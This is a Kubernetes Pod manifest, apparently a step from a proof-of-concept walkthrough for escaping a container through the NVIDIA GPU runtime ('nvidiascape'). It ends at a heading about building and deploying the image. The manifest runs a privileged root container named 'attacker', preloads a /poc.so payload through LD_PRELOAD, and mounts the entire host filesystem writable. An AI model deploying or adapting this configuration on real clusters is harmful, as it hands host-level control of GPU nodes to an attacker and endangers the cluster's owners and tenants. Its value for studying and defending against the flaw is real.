apiVersion: v1
kind: Pod
metadata:
  name: nvidiascape-demo
  labels:
    app: nvidiascape
spec:
  runtimeClassName: nvidia                   # cri-o/containerd on GPU node honours this
  restartPolicy: Never
  securityContext:
    runAsUser: 0
    privileged: true                         # enables mount & namespace syscalls
  containers:
  - name: attacker
    image: <ACCOUNT_ID>.dkr.ecr.us-east-1.amazonaws.com/nvidiascape-demo:latest
    resources:
      limits:
        nvidia.com/gpu: 1
    env:
    - name: LD_PRELOAD
      value: /poc.so                         # redundant but explicit
    volumeMounts:
    - name: host-root
      mountPath: /host                       # give poc.so a writable host path
      readOnly: false
  volumes:
  - name: host-root
    hostPath:
      path: /
      type: Directory                        # full host FS

5. Build Image and Deploy 

